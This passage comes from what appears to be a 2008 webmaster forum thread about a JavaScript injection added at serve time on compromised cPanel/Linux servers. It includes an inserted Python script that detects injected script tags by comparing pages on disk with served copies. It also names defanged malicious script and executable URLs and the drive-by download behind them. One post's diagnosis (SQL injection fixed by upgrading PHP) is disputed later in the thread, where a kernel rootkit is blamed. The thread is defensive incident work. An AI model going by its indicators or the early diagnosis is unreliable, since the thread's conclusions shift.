possible. The javascript injection comes and goes. As soon as you
notice it in a file it will be gone from the file by the time you
bring the file up from the server. I have only got as far as I have by
viewing the source in Firefox and its cache.
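One way to show that the tag is being added at serve time rather than sitting in the file, as an added Python example that is not code from anyone in this thread: diff the page on disk against several fetches of the same URL and keep only the script sources that appear in served copies. The HTML samples below are constructed to mirror what Oliver describes above (the tag right after <BODY> in the 1st and 3rd of four responses, the names ysxgj.js and eizru.js taken from his post); the fetch helper at the end is for a real run and is not exercised by the constructed sample.

```python
import re
import urllib.request

SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
# Bare, short, lowercase .js name in the site root, like ysxgj.js / eizru.js above
RANDOM_NAME_RE = re.compile(r"^[a-z]{4,8}\.js$")

# Constructed sample: the page as it sits on disk ...
DISK_HTML = (
    "<html><head><title>Yarn</title>"
    "<script type='text/javascript' src='/js/site.js'></script></head>\n"
    "<BODY>\n<p>Hand-dyed yarn</p>\n</BODY></html>\n"
)


def _inject(name):
    """Constructed served copy: the on-disk page with the kit's tag after <BODY>."""
    tag = "<script language='JavaScript' type='text/javascript' src='%s'></script>" % name
    return DISK_HTML.replace("<BODY>", "<BODY>" + tag, 1)


# ... and four constructed fetches of the same URL, 1st and 3rd carrying the tag.
SERVED_SAMPLES = [_inject("ysxgj.js"), DISK_HTML, _inject("eizru.js"), DISK_HTML]


def script_srcs(html):
    return SCRIPT_SRC_RE.findall(html)


def is_suspicious_name(src):
    return bool(RANDOM_NAME_RE.match(src))


def find_serve_time_injection(disk_html, served_samples):
    """Script sources present in served copies but absent from the file on disk
    were added on the way out: by the web server, a module, or something below
    it, not by an edit to the file. Works whether or not the page has a <body>
    tag, since it compares all <script src> values rather than one position."""
    baseline = set(script_srcs(disk_html))
    per_sample = [sorted(set(script_srcs(s)) - baseline) for s in served_samples]
    injected = sorted({s for p in per_sample for s in p})
    return {
        "baseline_srcs": sorted(baseline),
        "injected_per_sample": per_sample,
        "clean_samples": sum(1 for p in per_sample if not p),
        "injected": injected,
        "suspicious": [s for s in injected if is_suspicious_name(s)],
    }


def fetch_samples(url, count=4):
    """Network helper for a real run (not used by the constructed sample). Fetch the
    page several times posing as an IE visitor arriving from a search result; the
    post above reports the server eventually stopped serving the script to the
    scanning IP, so repeat from a second network before calling a server clean."""
    headers = {
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
        "Referer": "http://www.google.com/search?q=garden+party+fibers",
    }
    out = []
    for _ in range(count):
        req = urllib.request.Request(url, headers=headers)
        with urllib.request.urlopen(req, timeout=15) as resp:
            out.append(resp.read().decode("latin-1"))
    return out


if __name__ == "__main__":
    for key, value in find_serve_time_injection(DISK_HTML, SERVED_SAMPLES).items():
        print("%s: %s" % (key, value))
```

If the on-disk copy is clean and `injected` is non-empty, stop looking for the tag in your files and database and treat the host itself as compromised, which is where this thread ends up.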

Murdoch

unread,
Jan 14, 2008, 7:30:26 AM1/14/08
to stopbadware
Our server was restored from backups just recently. The whole HD was
replaced. Did not help. The only PHP code is stuff I have developed
myself, nothing public, and I can tell from the way the javascript
injections are appearing it is not to blame. The code is coming out in
a part of the page not controlled by my system, and obviously this
Garden Party Fibers site is not powered by my system. That's why I am
trying to see if we can isolate a common denominator piece of
software.

Flattery

unread,
Jan 14, 2008, 8:01:52 AM1/14/08
to stopbadware
> When you're investigating your own site, never use View Source in your
> browser. Go straight to the source code file on the server.

There is nothing in the file at this point... I am thinking that the
server is injecting the code after the body tag on the fly.


> My server too has been infected by this exploit. We should compare
> software version lists. If there is a common piece of software, that
> means it is the likely culprit.
>
> The server is running cPanel 11.16.0-R18546 with PHP 4.4.7, MySQL
> 4.1.22, Apache 2.0.61, and Perl 5.8.8.

Server details are:
Apache version 1.3.39 (Unix)
MySQL version 4.1.22-standard
cPanel Version 11.16.0-STABLE_18450
PHP version 4.4.7
Perl version 5.8.8


Thanks

Chris Wright

unread,
Jan 14, 2008, 8:38:39 AM1/14/08
to stopb...@googlegroups.com
Do you host directly with Soft Layer or via a 3rd party reseller?

There are 395 other domains hosted on the same server as yours, so it would be interesting to see if any of those are affected as well.
(which would indicate that one of the core modules above has been compromised).

I have seen problems with Soft Layer before where a whole server has been compromised, but IIRC that was with people buying a dedicated server and hosting multiple domains (as a reseller) rather than Soft Layer shared hosting.  (Those buying dedicated servers are usually responsible for the update and patching of the core modules which is why they tend to fall behind).

I can send a list of the 395 other domains 'off-list' rather than make it public here if anyone is interested
(or you can go to http://www.linkvendor.com/seo-tools/domains-from-ip.html and grab the list yourself).

** Murdoch: Who are you hosted with? (Or what is your domain name ?)

Regards

Chris

SteveW

unread,
Jan 14, 2008, 9:02:15 AM1/14/08
to stopbadware
Murdoch and Flattery,

Are both these sites run by a CMS, so the page data is stored in a
database? If so, could have been an SQL injection attack, so the bad
code is now stored in the db, being inserted while the page is built.

Jart

unread,
Jan 14, 2008, 9:24:47 AM1/14/08
to stopbadware
Hi All,

Yes can confirm the inline javascript hxxp: gardenpartyfibers(dot)com/
xsxvp(dot)js - this:

(a) Is a MITM (man in the middle) SQL DB injection, but is plugged via
a weakness in PHP - PHP recommend server upgrade to version 5.2.1 -
contact your host to upgrade after cleansing.

(b) When decoded the obscured script, it is trying to inject
"mosvs8(dot)exe" as a nasty drive by user exploitation. This was only
first detected on Jan 13th see JS_IESLICE.AQ on Trend
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=JS%5FIESLICE%2EAQ&VSect=P

Suggest:

1. Ensure your PC is not infected with this first

2. Upgrade PHP

3. Check every file on your server with a secure FTP; it is there
somewhere as a MySQL Db call - delete and secure the directories,

4. Pass on above to host to ensure prevention.


Hope this helps

Jart

Flattery

unread,
Jan 14, 2008, 5:29:00 PM1/14/08
to stopbadware
So it is not the server injecting it after the <body> tag? I tried to
remove the body tag for now to see if it goes away, but unfortunately
like I said... I cannot see the injection from my computer, but I have
seen it in search engine caches so I do know that it was there.

can anyone confirm that it is still showing up without the <body> tag?



Nothing shows up in the database like this and there is nothing in the
file after the <body> tag that I can see could inject it with. Also
as I have temporarily removed the <body> tag I don't know if it is
still injecting or where it is injecting it now.

I am working with my hoster to fix the problem, but they don't offer
the best service.


On Jan 14, 8:24 am, Jart <jart...@googlemail.com> wrote:
> Hi All,
>
> Yes can confirm the inline javascript hxxp: gardenpartyfibers(dot)com/
> xsxvp(dot)js - this:
>
> (a) Is a MITM (man in the middle) SQL DB injection, but is plugged via
> a weakness in PHP - PHP recommend server upgrade to version 5.2.1 -
> contact your host to upgrade after cleansing.
>
> (b) When decoded the obscured script, it is trying to inject
> "mosvs8(dot)exe" as a nasty drive by user exploitation. This was only
> first detected on Jan 13th see JS_IESLICE.AQ on Trendhttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=JS%5F...

Murdoch

unread,
Jan 14, 2008, 6:06:33 PM1/14/08
to stopbadware
I can confirm that removing the body tag doesn't help. Tried it,
failed.

I have scanned my the database of my CMS (which is completely custom
and also hidden, it never exposes it's GET parameters or even a .PHP
extension, all hidden with rewrite rules in HTML files) for rogue
code, of which there is not a trace. Additionally, pages on the server
that have no PHP code at all are being hit.

The comments on this article show that PHP versions as recent as 5.2.5
are affected.

http://www.theregister.co.uk/2008/01/11/mysterious_web_infection/comments/#c_130431

Chris Wright

unread,
Jan 14, 2008, 6:25:22 PM1/14/08
to stopb...@googlegroups.com
Murdoch wrote:
> I can confirm that removing the body tag doesn't help. Tried it,
> failed.
>
> I have scanned my the database of my CMS (which is completely custom
> and also hidden, it never exposes it's GET parameters or even a .PHP
> extension, all hidden with rewrite rules in HTML files) for rogue
> code, of which there is not a trace. Additionally, pages on the server
> that have no PHP code at all are being hit.
>
> The comments on this article show that PHP versoins as recent as 5.2.5
> are affected.
>
> http://www.theregister.co.uk/2008/01/11/mysterious_web_infection/comments/#c_130431
>
>

Murdoch: Which hosting company are you with? (Or what is the IP / URL
of your site?)
You can email me this information off-list if you want to keep it from
public view.
Does your site also run on shared hosting?

Regards

Chris

Murdoch

unread,
Jan 15, 2008, 9:51:05 PM1/15/08
to stopbadware
That info won't help Chris. This is not an SQL injection attack, but a
rootkit installed due to a Linux kernel flaw. Several different Linux
variants are affected.

http://forums.cpanel.net/showthread.php?p=348503
http://www.cpanel.net/security/notes/random_js_toolkit.html

On Jan 15, 12:25 pm, Chris Wright <chris.a.wri...@gmail.com> wrote:
> Murdoch wrote:
> > I can confirm that removing the body tag doesn't help. Tried it,
> > failed.
>
> > I have scanned my the database of my CMS (which is completely custom
> > and also hidden, it never exposes it's GET parameters or even a .PHP
> > extension, all hidden with rewrite rules in HTML files) for rogue
> > code, of which there is not a trace. Additionally, pages on the server
> > that have no PHP code at all are being hit.
>
> > The comments on this article show that PHP versoins as recent as 5.2.5
> > are affected.
>
> >http://www.theregister.co.uk/2008/01/11/mysterious_web_infection/comm...

Chris Wright

unread,
Jan 16, 2008, 4:02:13 AM1/16/08
to stopb...@googlegroups.com
Chris Wright wrote:
> Murdoch: Which hosting company are you with? (Or what is the IP / URL
> of your site?)
> You can email me this information off-list if you want to keep it from
> public view.
> Does your site also run on shared hosting?

Murdoch wrote:
> That info won't help Chris. This is not an SQL injection attack, but a
> rootkit installed due to a Linux kernel flaw. Several different Linux
> variants are affected.
>
> http://forums.cpanel.net/showthread.php?p=348503
> http://www.cpanel.net/security/notes/random_js_toolkit.html

I just wanted to know what hosting provider you are with to see if it's
one of the good guys (obviously not a particularly good one if they
allowed their systems to fall foul).

We were trying to find a common link, not only in software/OS etc, but
in web hosts.
Not a problem if you don't want to share, it was only out of interest
more than anything else.

Regards

Chris

Murdoch

unread,
Jan 16, 2008, 3:33:45 PM1/16/08
to stopbadware
The only common factor I can see is that it affects Linux derivatives
- Fedora, Red Hat and CentOS seem to be the big ones affected. To be
honest, I do not know who our web host is. My boss has contact with
the data centre we use, not me. We run our own dedicated server for
our clients and resellers.

They are one of those data centres that will do as little as
practically possible to help clients, will charge you for everything
and anything, but curiously back down relatively easily when pressed
if the charge is challenged on moral grounds. For example, we recently
set up a second server to split the data load, with a new control
panel called ServerCP. We also wanted to test it to see if it was a
viable replacement for the much more expensive cPanel. It has since
proven itself faulty (the name servers don't set up right) and we have
had to trash it and reinstall cPanel. They were going to charge us US
$65 to do so. The boss challenged that, saying they effectively sold
us a faulty product in the form of ServerCP, so they then said they
would do it for free.

We hope to be able to reformat at least one server with FreeBSD
instead of Linux. Fingers crossed.

Flattery

unread,
Jan 17, 2008, 4:14:27 AM1/17/08
to stopbadware
My server seems to be fixed... Google isn't flagging it anymore.
Thanks for all the help.